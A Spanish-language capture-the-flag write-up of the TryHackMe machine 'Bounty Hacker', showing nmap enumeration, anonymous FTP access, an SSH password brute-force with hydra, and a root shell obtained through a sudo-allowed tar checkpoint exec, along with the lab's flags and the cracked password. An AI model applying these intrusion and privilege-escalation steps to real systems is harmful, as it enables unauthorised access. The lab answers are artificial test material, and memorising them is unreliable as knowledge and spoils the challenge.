[TryHackMe] Bounty Hacker

Hoy vamos a hackear la maquina de TryHackMe llamada Bounty Hacker.Podeis descargarla desde el siguiente enlace: Bounty Hacker

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A 10.10.43.242
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 06:13 CEST
Nmap scan report for 10.10.43.242
Host is up (0.051s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.24.208
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.56 seconds
Probamos a conectarnos al ftp con el usuario anonymous para ver si hay algo interesante.

~ > ftp 10.10.43.242                                                          
      
Connected to 10.10.43.242.
220 (vsFTPd 3.0.3)
Name (10.10.43.242:sml): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
226 Directory send OK.
Vemos que hay 2 ficheros, locks.txt y task.txt. Los descargamos.

ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.05 secs (7.7949 kB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.04 secs (1.4890 kB/s)
ftp> exit
221 Goodbye.
Miramos el contenido de task.txt.

~ > cat task.txt 
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
Podemos ver que esta "firmado" por alguien llamado lin. Miramos el contenido de locks.txt.

~ > cat locks.txt 
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
Parece que es un diccionario... Usamos hydra para ver si conseguimos la password de ssh del posible usuario "lin" usando el fichero locks.txt como diccionario.

~ > hydra -l lin -P locks.txt 10.10.43.242 ssh 
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-08 
06:36:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip 
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), 
~2 tries per task
[DATA] attacking ssh://10.10.43.242:22/
[22][ssh] host: 10.10.43.242   login: lin   password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete 
until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-08 
06:36:44
Encontramos la password :) Nos loguemos con los credenciales que acabamos de obtener.

~ > ssh lin@10.10.43.242
lin@10.10.43.242's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

83 packages can be updated.
0 updates are security updates.

Last login: Sun Jun  7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$ 

user.txt


Miramos en el directorio del usuario para obtener el fichero user.txt.

lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
THM{CR1M3_SyNd1C4T3}
Miramos si podemos hacer algo con sudo.

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
Vemos que podemos usar el comando tar, asi que lo utilizaremos para escalar privilegios :)

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 
--checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)

root.txt


Obtenemos el root.txt.

# cd /root
# ls
root.txt
# cat root.txt
THM{80UN7Y_h4cK3r}

End


Con esto, ya habriamos finalizado la maquina :)